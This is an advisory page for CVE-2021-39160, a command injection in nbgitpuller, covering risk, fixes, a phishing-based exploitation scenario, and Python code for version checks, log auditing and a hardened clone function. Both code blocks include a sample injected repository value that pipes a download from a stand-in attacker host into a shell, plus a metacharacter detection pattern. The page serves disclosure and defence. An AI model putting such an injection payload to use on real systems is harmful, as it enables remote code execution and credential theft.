CVE-2021-39160: nbgitpuller: RCE via OS command injection in git URLs

GHSA-mq5p-2mcr-m52j HIGH
Published August 30, 2021
CISO Take

nbgitpuller, a JupyterHub extension widely deployed in AI/ML research and data science platforms, allows remote code execution inside a user's notebook server when that user clicks a crafted link; the attacker needs no account on the hub, only a victim who is logged in. Jupyter environments typically hold training data, model artifacts, API keys, and cloud credentials, making this a high-value pivot point. Upgrade to 0.10.2 immediately; for versions 0.9.0–0.10.1 the only alternative is a downgrade to 0.8.x.

Risk Assessment

High risk for organizations running JupyterHub-based ML platforms. CVSS 8.8 reflects network reachability, no privileges required of the attacker (the victim must be logged in and click the link), and full confidentiality, integrity and availability impact on the victim's notebook server. The low EPSS (0.83%) means exploitation in the wild is not expected to be common, not that the attack is hard: a single link click by any data scientist or ML engineer is sufficient. Blast radius is amplified by the privileged access Jupyter servers typically have to model registries, cloud storage, and CI/CD pipelines.

Affected Systems

Package        Ecosystem   Vulnerable Range        Patched
nbgitpuller    pip         >= 0.9.0, <= 0.10.1     0.10.2

Running nbgitpuller 0.9.0 through 0.10.1? You're affected.

Severity & Risk

CVSS 3.1: 8.8 / 10
EPSS: 0.83% chance of exploitation in the next 30 days (higher than 75% of all CVEs)
Exploitation Status: No known exploitation
Sophistication: Trivial

Attack Surface

Attack Vector (AV): Network
Attack Complexity (AC): Low
Privileges Required (PR): None
User Interaction (UI): Required
Scope (S): Unchanged
Confidentiality (C): High
Integrity (I): High
Availability (A): High

Recommended Action

6 steps
  1. Patch: Upgrade nbgitpuller to 0.10.2 on all JupyterHub instances.

  2. If upgrade is not immediately feasible, downgrade to 0.8.x as the only available workaround.

  3. Disable or remove nbgitpuller if the feature is not actively used.

  4. Audit JupyterHub proxy and single-user server access logs for git-pull requests whose repo, branch or subPath query parameters contain shell metacharacters, start with a dash, or point at unexpected hosts, and for git clone activity the team did not initiate.

  5. Apply network egress controls on Jupyter servers so that an injected command cannot fetch a second-stage payload, call back to the attacker, or reach internal systems.

  6. Rotate any secrets or credentials accessible from affected Jupyter environments as a precaution.
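Steps 1 and 4 above can be scripted. The Python below is an added example, not code from this advisory or from the nbgitpuller project: it checks an installed version against the advisory's vulnerable range and scans access logs for git-pull requests whose parameters carry shell metacharacters or values git would read as options. It assumes combined/NCSA access-log format and nbgitpuller's link shape (a path ending in /git-pull with repo, branch, urlpath and subPath query parameters); the log lines are constructed for the example.

```python
"""Triage helpers for CVE-2021-39160: version check and access-log audit.

Added example, not code from the advisory or from the nbgitpuller project.
Assumptions (not stated by the advisory): JupyterHub proxy logs use the
combined/NCSA access-log format, and nbgitpuller links have a path ending
in /git-pull with repo, branch, urlpath and subPath query parameters, the
shape produced by nbgitpuller's own link generator.
"""
import re
from importlib import metadata
from urllib.parse import parse_qs, urlsplit

# Advisory range: >= 0.9.0, <= 0.10.1 vulnerable, 0.10.2 fixed.
VULN_MIN = (0, 9, 0)
VULN_MAX = (0, 10, 1)


def parse_version(version: str) -> tuple:
    """Reduce '0.10.1' (or '0.10.1rc1') to a comparable (major, minor, patch) tuple."""
    m = re.match(r"(\d+)\.(\d+)(?:\.(\d+))?", version)
    if not m:
        raise ValueError(f"unrecognised version string: {version!r}")
    return tuple(int(part or 0) for part in m.groups())


def is_vulnerable(version: str) -> bool:
    """True when the version falls inside the advisory's vulnerable range."""
    return VULN_MIN <= parse_version(version) <= VULN_MAX


def installed_status() -> str:
    """Step 1: report whether the nbgitpuller in this environment needs the upgrade."""
    try:
        version = metadata.version("nbgitpuller")
    except metadata.PackageNotFoundError:
        return "nbgitpuller is not installed in this environment"
    if is_vulnerable(version):
        return f"nbgitpuller {version}: VULNERABLE, upgrade to 0.10.2"
    return f"nbgitpuller {version}: not in the vulnerable range"


# Step 4 heuristic: shell metacharacters, a value git would read as an
# option (leading '-'), or git's command-running ext:: transport.
SUSPICIOUS = re.compile(r"[;|&`$<>\n]|^-|^ext::", re.IGNORECASE)
CHECKED_PARAMS = ("repo", "branch", "subPath")

# Combined log line: client ident user [time] "METHOD target PROTO" status bytes
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)


def audit_line(line: str):
    """Return (client, time, flagged_params) for a suspicious git-pull request, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    url = urlsplit(m.group("target"))
    if not url.path.endswith("/git-pull"):
        return None
    # parse_qs percent-decodes, so we inspect what nbgitpuller would have seen
    params = {k: v[0] for k, v in parse_qs(url.query, keep_blank_values=True).items()}
    flagged = {k: v for k, v in params.items()
               if k in CHECKED_PARAMS and SUSPICIOUS.search(v)}
    if not flagged:
        return None
    return m.group("client"), m.group("time"), flagged


def audit_log(text: str) -> list:
    """Scan a whole access log; one record per suspicious git-pull request."""
    return [hit for hit in (audit_line(line) for line in text.splitlines()) if hit]


# Constructed sample log: a benign pull, an injected repo URL, an unrelated request.
SAMPLE_LOG = """\
10.0.0.5 - - [24/Mar/2026:10:01:12 +0000] "GET /hub/user-redirect/git-pull?repo=https%3A%2F%2Fgithub.com%2Fexample%2Fcourse&branch=main&urlpath=lab HTTP/1.1" 302 0
10.0.0.9 - - [24/Mar/2026:10:03:44 +0000] "GET /hub/user-redirect/git-pull?repo=https%3A%2F%2Fgithub.com%2Fexample%2Fcourse%3B%20curl%20http%3A%2F%2Fevil.example%2Fx%7Csh&branch=main HTTP/1.1" 302 0
10.0.0.7 - - [24/Mar/2026:10:05:01 +0000] "GET /user/alice/lab HTTP/1.1" 200 5120
"""

if __name__ == "__main__":
    print(installed_status())
    for client, when, flagged in audit_log(SAMPLE_LOG):
        print(f"{when} {client} suspicious git-pull parameters: {flagged}")
```

The scanner is a denylist heuristic for triage, not a filter: a hit means "look at this request and the user's server", and a clean log does not prove the link was never clicked from a client whose traffic bypassed the proxy.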

Classification

Compliance Impact

This CVE is relevant to:

EU AI Act
Art. 9 - Risk Management System for High-Risk AI
ISO 42001
A.6.2.5 - Security of AI system components and dependencies
NIST AI RMF
GOVERN 1.7 - Processes for vulnerability disclosure and response
MANAGE 2.4 - Residual risks and organizational risk tolerance
OWASP LLM Top 10
LLM05:2025 - Improper Output Handling / Insecure Plugin Design

Frequently Asked Questions

What is CVE-2021-39160?

CVE-2021-39160 is an OS command injection in nbgitpuller, a JupyterHub extension widely deployed in AI/ML research and data science platforms. Unsanitized input from a crafted link is executed in the notebook server of the logged-in user who clicks it, giving the attacker code execution in an environment that typically holds training data, model artifacts, API keys, and cloud credentials. Versions 0.9.0 through 0.10.1 are affected; upgrade to 0.10.2, or downgrade to 0.8.x if you cannot.

Is CVE-2021-39160 actively exploited?

No confirmed active exploitation of CVE-2021-39160 has been reported, but organizations should still patch proactively.

How to fix CVE-2021-39160?

1. Patch: Upgrade nbgitpuller to 0.10.2 on all JupyterHub instances.
2. If upgrade is not immediately feasible, downgrade to 0.8.x as the only available workaround.
3. Disable or remove nbgitpuller if the feature is not actively used.
4. Audit JupyterHub proxy and single-user server access logs for git-pull requests whose repo, branch or subPath query parameters contain shell metacharacters, start with a dash, or point at unexpected hosts, and for git clone activity the team did not initiate.
5. Apply network egress controls on Jupyter servers so that an injected command cannot fetch a second-stage payload, call back to the attacker, or reach internal systems.
6. Rotate any secrets or credentials accessible from affected Jupyter environments as a precaution.

What systems are affected by CVE-2021-39160?

This vulnerability affects the following AI/ML architecture patterns: Jupyter notebook environments, ML training platforms, Collaborative AI development platforms, JupyterHub multi-user deployments.

What is the CVSS score for CVE-2021-39160?

CVE-2021-39160 has a CVSS v3.1 base score of 8.8 (HIGH). The EPSS exploitation probability is 0.83%.

Technical Details

NVD Description

Impact: Due to an unsanitized input, visiting maliciously crafted links could result in arbitrary code execution in the user environment.
Patches: 0.10.2
Workarounds: None, other than upgrade to 0.10.2 or downgrade to 0.8.x.
For more information: If you have any questions or comments about this advisory, open an issue in nbgitpuller (https://github.com/jupyterhub/nbgitpuller/issues) or email our security team at security@ipython.org.

Exploitation Scenario

An attacker targets a data science team using JupyterHub with nbgitpuller enabled. They craft a malicious nbgitpuller link whose query parameters (the repository URL or branch name) carry shell metacharacters that nbgitpuller does not sanitize. The link is delivered via a phishing email disguised as a shared notebook or dataset link, a common workflow in ML teams. When the victim clicks it while logged in to JupyterHub, nbgitpuller processes the unsanitized input and the injected commands run in the victim's notebook server's OS context, with the victim's privileges. The attacker now has code execution: they read cloud credentials from environment variables and pivot to the organization's model registry or S3 training-data buckets.
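The bug class in the scenario, a repository URL or branch name reaching the operating system unchecked, is easiest to see beside its hardened form. The Python below is an added illustration, not nbgitpuller's code and not the project's actual 0.10.2 fix: the URL policy in REPO_RE, the branch rule in BRANCH_RE, the function names, and the git options used in safe_clone_argv are this example's own assumptions.

```python
"""The injection pattern beside a hardened handler, for the bug class in
CVE-2021-39160.

Added example: this is not nbgitpuller's code and does not reproduce the
project's 0.10.2 fix. The URL policy (REPO_RE), the branch rule (BRANCH_RE)
and the git options used in safe_clone_argv are this example's assumptions.
"""
import re
import subprocess

# Allowlist of repository URL shapes: https:// or ssh:// with host, optional
# port and path, or scp-style user@host:path. Local paths, file://, ext::,
# embedded credentials and anything starting with '-' do not match.
REPO_RE = re.compile(
    r"^(?:https://|ssh://(?:[\w.-]+@)?)[\w.-]+(?::\d{1,5})?/[\w./-]+$"
    r"|^[\w.-]+@[\w.-]+:[\w./-]+$"
)
# Branch: no leading '-', no '..', only word characters, '.', '/', '-'.
BRANCH_RE = re.compile(r"^(?!-)(?!.*\.\.)[\w./-]+$")


class BadInput(ValueError):
    """Raised when a link parameter fails the allowlist."""


def validate_repo(repo: str) -> str:
    if not REPO_RE.fullmatch(repo):
        raise BadInput(f"repository URL rejected: {repo!r}")
    return repo


def validate_branch(branch: str) -> str:
    if not BRANCH_RE.fullmatch(branch):
        raise BadInput(f"branch name rejected: {branch!r}")
    return branch


def accepts(repo: str, branch: str = "main") -> bool:
    """True when both values pass validation."""
    try:
        validate_repo(repo)
        validate_branch(branch)
    except BadInput:
        return False
    return True


def vulnerable_clone_command(repo: str, branch: str) -> str:
    """The bug class: link parameters interpolated into a shell command line.
    Returned as a string, not executed, so a payload can be inspected safely;
    handing this to a shell would run whatever follows ';' or '|'."""
    return f"git clone --branch {branch} {repo} target"


def safe_clone_argv(repo: str, branch: str) -> list:
    """Hardened form: validated values, an argv list (no shell), '--' so git
    cannot read the URL as an option, and the ext:: transport pinned off as
    general git hardening."""
    repo = validate_repo(repo)
    branch = validate_branch(branch)
    return ["git", "-c", "protocol.ext.allow=never", "clone",
            "--branch", branch, "--", repo, "target"]


def safe_clone(repo: str, branch: str, cwd: str) -> None:
    """Run the hardened command; never shell=True with user-controlled input."""
    subprocess.run(safe_clone_argv(repo, branch), cwd=cwd, check=True)


if __name__ == "__main__":
    payload = "https://github.com/example/course; curl http://evil.example/x|sh"
    print("vulnerable:", vulnerable_clone_command(payload, "main"))
    print("hardened:  ", safe_clone_argv("https://github.com/example/course", "main"))
    try:
        safe_clone_argv(payload, "main")
    except BadInput as exc:
        print("hardened rejected:", exc)
```

The allowlist is deliberately stricter than what git itself would accept: a platform that only ever pulls course or team repositories loses nothing by refusing local paths, credentials in URLs and unusual transports, and gains a check that fails closed when a new injection trick appears rather than depending on a denylist of known bad characters.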

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

Timeline

Published
August 30, 2021
Last Modified
October 3, 2024
First Seen
March 24, 2026

Related Vulnerabilities